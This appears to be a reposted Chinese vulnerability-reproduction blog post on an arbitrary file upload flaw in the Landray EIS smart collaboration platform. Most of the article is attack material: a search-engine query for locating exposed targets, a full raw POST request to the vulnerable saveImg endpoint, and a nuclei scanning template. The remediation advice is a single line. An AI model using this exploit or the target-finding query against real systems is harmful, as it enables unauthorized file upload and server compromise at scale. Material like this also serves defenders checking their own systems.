漏洞复现|蓝凌EIS智慧协同平台任意文件上传

admin
admin
admin
137432
文章
113
评论
2024年2月17日00:42:10评论41 views字数 2207阅读7分21秒阅读模式
免责声明
  由于传播、利用本公众号零点安全团队提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号零点安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

漏洞复现|蓝凌EIS智慧协同平台任意文件上传

漏洞复现|蓝凌EIS智慧协同平台任意文件上传

蓝凌智慧协同平台介绍

蓝凌智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用 统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台。
漏洞复现|蓝凌EIS智慧协同平台任意文件上传

漏洞搜索

web.title=”智慧协同平台”或者web.similar_icon==”14311050366792584935”(后面这个需要开会员)

漏洞点

在根目录下的eis/service/api.aspx文件中

漏洞复现

1.hunter搜索web.title=”智慧协同平台”,看到下述icon即为蓝凌智慧协同平台。
漏洞复现|蓝凌EIS智慧协同平台任意文件上传

2.构造数据包。

POST /eis/service/api.aspx?action=saveImg HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Length: 185Origin: xxxxxxxxConnection: closeCookie: ASP.NET_SessionId=dthhzbzqgnlhck454ctpxa55; Lang=zh-cnUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu------WebKitFormBoundaryxdgaqmquContent-Disposition: form-data; name="file"filename="aaaaaaa.txt"Content-Type: text/htmlafhsahgsdaihguisabghs------WebKitFormBoundaryxdgaqmqu--

3.将构造好的包发送,可以从响应包中获得文件上传地址。
漏洞复现|蓝凌EIS智慧协同平台任意文件上传

4.访问该地址,可以看到上传的内容。
漏洞复现|蓝凌EIS智慧协同平台任意文件上传

nuclei poc

id: lanling-uploadinfo:  name: lanling-upload  author: xxxx  severity: info  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |-        POST /eis/service/api.aspx?action=saveImg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        Cookie: Lang=zh-cn; ASP.NET_SessionId=qaygc4nrdrf1flm3vzor04zz        Content-Length: 185        Upgrade-Insecure-Requests: 1        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu        ------WebKitFormBoundaryxdgaqmqu        Content-Disposition: form-data; name="file"filename="aaaaaaa.txt"        Content-Type: text/html        afhsahgsdaihguisabghs        ------WebKitFormBoundaryxdgaqmqu--    matchers-condition: and    matchers:      - type: word        part: body        words:          - txt      - type: status        status:          - 200

验证

漏洞复现|蓝凌EIS智慧协同平台任意文件上传

漏洞修复

对用户上传的文件进行过滤,包括后缀和文件内容

原文始发于微信公众号(零点安全团队):漏洞复现|蓝凌EIS智慧协同平台任意文件上传

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月17日00:42:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现|蓝凌EIS智慧协同平台任意文件上传https://cn-sec.com/archives/2227270.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息